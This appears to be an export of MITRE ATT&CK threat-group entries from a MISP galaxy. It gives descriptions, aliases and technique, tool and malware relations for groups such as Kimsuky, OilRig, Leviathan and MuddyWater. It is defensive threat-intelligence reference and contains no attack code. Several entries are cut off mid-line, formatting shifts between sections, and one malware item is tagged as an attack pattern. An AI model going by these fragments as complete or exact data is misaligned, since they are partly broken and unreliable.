• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group">https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group</a></td>
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</table>

**RTM - G0048**

[RTM](https://attack.mitre.org/groups/G0048) is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name ([RTM](https://attack.mitre.org/software/S0148)). (Citation: ESET RTM Feb 2017)

The tag is: *misp-galaxy:mitre-intrusion-set="RTM - G0048"*

RTM - G0048 is also known as:

- RTM

RTM - G0048 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="RTM - S0148" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with

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Kimsuky - G0094

[Kimsuky](https://attack.mitre.org/groups/G0094) is a North Korean-based threat group that has been active since at least September 2013. The group initially focused on targeting Korean think tanks and DPRK/nuclear-related targets, expanding recently to the United States, Russia, and Europe. The group was attributed as the actor behind the Korea Hydro & Nuclear Power Co. compromise. (Citation: EST Kimsuky April 2019) (Citation: BRI Kimsuky April 2019) (Citation: Cybereason Kimsuky November 2020)

The tag is: `misp-galaxy:mitre-intrusion-set="Kimsuky - G0094"`

Kimsuky - G0094 is also known as:

- Kimsuky
- Thallium
- Black Banshee
- Velvet Chollima

Kimsuky - G0094 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Change Default File Association - T1546.001" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Browser Extensions - T1176" with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Develop Capabilities - T1587" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Email Accounts - T1586.002" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="BabyShark - S0414" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Man-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Email Forwarding Rule - T1114.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="KGH_SPY - S0526" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="schtasks - S0111" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="NOKKI - S0353" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

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</table>

OilRig - G0049

[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. (Citation: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 2017) (Citation: FireEye APT34 Dec 2017) (Citation: Unit 42 QUADAGENT July 2018) This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity.

The tag is: misp-galaxy:mitre-intrusion-set="OilRig - G0049"

OilRig - G0049 is also known as:

- OilRig
- COBALT GYPSY
- IRN2
- HELIX KITTEN
- APT34

OilRig - G0049 has relationships with:

- similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-
• similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

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• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-tool="netstat - S0104" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Tasklist - S0057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="SEASHARPEE - S0185" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-
- uses: misp-galaxy:mitre-tool="Reg - S0075" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="OopsIE - S0264" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="POWRUNER - S0184" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-
• uses: misp-galaxy:mitre-malware="Helminth - S0170" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
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• uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="certutil - S0160" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="LaZagne - S0349" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Systeminfo - S0096" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="FTP - S0095" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="QUADAGENT - S0269" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="BONDUPDATER - S0360" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-
- uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
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- uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Outlook Home Page - T1137.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="RDAT - S0495" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0049">https://attack.mitre.org/groups/G0049</a></td>
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NEODYMIUM - G0055

[NEODYMIUM](https://attack.mitre.org/groups/G0055) is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims. The group has demonstrated similarity to another activity group called [PROMETHIUM](https://attack.mitre.org/groups/G0056) due to overlapping victim and campaign characteristics. (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21) [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with [BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. (Citation: CyberScoop BlackOasis Oct 2017)

The tag is: *misp-galaxy:mitre-intrusion-set="NEODYMIUM - G0055"

NEODYMIUM - G0055 is also known as:

- NEODYMIUM

NEODYMIUM - G0055 has relationships with:

- similar: *misp-galaxy:microsoft-activity-group="NEODYMIUM" with estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:threat-actor="NEODYMIUM" with estimative-language:likelihood-probability="likely"
- uses: *misp-galaxy:mitre-malware="Wingbird - S0176" with estimative-language:likelihood-probability="almost-certain"

Table 4366. Table References

Links

https://attack.mitre.org/groups/G0055


PROMETHIUM - G0056

[PROMETHIUM](https://attack.mitre.org/groups/G0056) is an activity group focused on espionage that has been active since at least 2012. The group has conducted operations globally with a heavy emphasis on Turkish targets. [PROMETHIUM](https://attack.mitre.org/groups/G0056) has demonstrated similarity to another activity group called [NEODYMIUM](https://attack.mitre.org/groups/G0055) due to overlapping victim and campaign characteristics. (Citation: Microsoft NEODYMIUM Dec 2016)(Citation: Microsoft SIR Vol 21)(Citation: Talos Promethium June 2020)

The tag is: *misp-galaxy:mitre-intrusion-set="PROMETHIUM - G0056"

PROMETHIUM - G0056 is also known as:

- PROMETHIUM
- StrongPity

PROMETHIUM - G0056 has relationships with:

- similar: *misp-galaxy:microsoft-activity-group="PROMETHIUM"* with *estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:threat-actor="PROMETHIUM"* with *estimative-language:likelihood-probability="likely"
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- uses: *misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"* with *estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"* with *estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002"* with *estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Port Knocking - T1205.001"* with *estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003"* with *estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="StrongPity - S0491"* with *estimative-language:likelihood-probability="almost-certain"
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- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1587.003" with estimative-language:likelihood-probability="almost-certain"

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**Leviathan - G0065**

[Leviathan](https://attack.mitre.org/groups/G0065) is a cyber espionage group that has been active since at least 2013. The group generally targets defense and government organizations, but has also targeted a range of industries including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities in the United States, Western Europe, and along the South China Sea. (Citation: Proofpoint Leviathan Oct 2017) (Citation: FireEye Periscope March 2018)

The tag is: *misp-galaxy:mitre-intrusion-set="Leviathan - G0065"*

Leviathan - G0065 is also known as:

- Leviathan
- TEMP.Jumper
- APT40
- TEMP.Periscope

Leviathan - G0065 has relationships with:

- similar: misp-galaxy:threat-actor="Leviathan" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-malware="Derusbi - S0021" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="BITSAadmin - S0190" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="HOMEFRY - S0232" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="China Chopper - S0020" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

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• uses: misp-galaxy:mitre-malware="Orz - S0229" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="BLACKCOFFEE - S0069" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Windows Credential Editor - S0005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="at - S0110" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"

Table 4368. Table References
Rancor - G0075

[Rancor](https://attack.mitre.org/groups/G0075) is a threat group that has led targeted campaigns against the South East Asia region. [Rancor](https://attack.mitre.org/groups/G0075) uses politically-motivated lures to entice victims to open malicious documents. (Citation: Rancor Unit42 June 2018)

The tag is: *misp-galaxy:mitre-intrusion-set=*"Rancor - G0075"

Rancor - G0075 is also known as:

- Rancor

Rancor - G0075 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern=*"Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-malware=*"PLAINTEE - S0254" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-tool=*"certutil - S0160" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern=*"Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern=*"Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-malware=*"DDKONG - S0255" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-tool=*"Reg - S0075" with estimative-language:likelihood-probability="almost-certain"
Machete - G0095

[Machete](https://attack.mitre.org/groups/G0095) is a suspected Spanish-speaking cyber espionage group that has been active since at least 2010. It has primarily focused its operations within Latin America, with a particular emphasis on Venezuela, but also in the US, Europe, Russia, and parts of Asia. [Machete](https://attack.mitre.org/groups/G0095) generally targets high-profile organizations such as government institutions, intelligence services, and military units, as well as telecommunications and power companies.(Citation: Cylance Machete Mar 2017)(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)

The tag is: `misp-galaxy:mitre-intrusion-set="Machete - G0095"`

Machete - G0095 is also known as:

- Machete
- APT-C-43
- El Machete

Machete - G0095 has relationships with:

- uses: `misp-galaxy:mitre-malware="Machete - S0409"` with `estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001"` with `estimative-
Elderwood - G0066

[Elderwood](https://attack.mitre.org/groups/G0066) is a suspected Chinese cyber espionage group that was reportedly responsible for the 2009 Google intrusion known as Operation Aurora. (Citation: Security Affairs Elderwood Sept 2012) The group has targeted defense organizations, supply chain manufacturers, human rights and nongovernmental organizations (NGOs), and IT service providers. (Citation: Symantec Elderwood Sept 2012) (Citation: CSM Elderwood Sept 2012)

The tag is: `misp-galaxy:mitre-intrusion-set="Elderwood - G0066"`

Elderwood - G0066 is also known as:

- Elderwood
- Elderwood Gang
- Beijing Group
- Sneaky Panda

Elderwood - G0066 has relationships with:

- similar: `misp-galaxy:threat-actor="Beijing Group"` with estimative-language:likelihood-probability="almost-certain"
probability="likely"

- uses: misp-galaxy:mitre-malware="Linfo - S0211" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Briba - S0204" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Naid - S0205" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Hydraq - S0203" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Hydraq - S0203" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Nerex - S0210" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Wiarp - S0206" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Vasport - S0207" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Pasam - S0208" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

Table 4371. Table References

Links

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Thrip - G0076

[Thrip](https://attack.mitre.org/groups/G0076) is an espionage group that has targeted satellite communications, telecoms, and defense contractor companies in the U.S. and Southeast Asia. The group uses custom malware as well as "living off the land" techniques. (Citation: Symantec Thrip June 2018)

The tag is: `misp-galaxy:mitre-intrusion-set="Thrip - G0076"`

Thrip - G0076 is also known as:

- Thrip

Thrip - G0076 has relationships with:

- uses: `misp-galaxy:mitre-malware="Catchamas - S0261"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-tool="PsExec - S0029"` with `estimative-language:likelihood-probability="almost-certain"`

Table 4372. Table References

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<td><a href="https://attack.mitre.org/groups/G0076">https://attack.mitre.org/groups/G0076</a></td>
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<tr>
<td><a href="https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets">https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets</a></td>
</tr>
</tbody>
</table>
PLATINUM - G0068

[PLATINUM](https://attack.mitre.org/groups/G0068) is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia. (Citation: Microsoft PLATINUM April 2016)

The tag is: misp-galaxy/mitre-intrusion-set="PLATINUM - G0068"

PLATINUM - G0068 is also known as:

- PLATINUM

PLATINUM - G0068 has relationships with:

- similar: misp-galaxy:microsoft-activity-group="PLATINUM" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="PLATINUM" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Dipsind - S0200" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="JPIN - S0201" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="adbupd - S0202" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-
MuddyWater - G0069

[MuddyWater](https://attack.mitre.org/groups/G0069) is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group's victims are mainly in the telecommunications, government (IT services), and oil sectors. Activity from this group was previously linked to [FIN7](https://attack.mitre.org/groups/G0046), but the group is believed to be a distinct group possibly motivated by espionage.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)

The tag is: `misp-galaxy:mitre-intrusion-set="MuddyWater - G0069"`

MuddyWater - G0069 is also known as:

- MuddyWater
- Earth Vetala
- MERCURY
- Static Kitten
- Seedworm
- TEMP.Zagros

MuddyWater - G0069 has relationships with:

- similar: `misp-galaxy:threat-actor="MuddyWater"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="POWERSTATS - S0223" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
